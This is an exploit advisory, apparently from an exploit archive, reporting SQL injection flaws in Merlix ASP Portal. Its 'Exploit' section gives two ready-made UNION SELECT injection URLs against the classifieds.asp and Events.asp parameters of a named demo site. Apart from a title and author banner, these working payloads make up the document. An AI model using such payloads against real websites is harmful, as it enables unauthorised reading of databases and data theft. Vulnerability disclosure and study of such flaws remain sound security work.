id: 4364
date: 12/05/2008
title: ASP PORTAL Multiple Remote SQL Injection Vulnerabilities
author: AlpHaNiX
cves: 

========================================================
ASP PORTAL Multiple Remote SQL Injection Vulnerabilities
========================================================


###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################

----------------------------------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX

###########################################################################

#script   : Merlix ASP PORTAL
#download : null
#Demo     : http://demo.merlix.com/portal/


#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory

###########################################################################



#  0day.today [2023-03-26]  #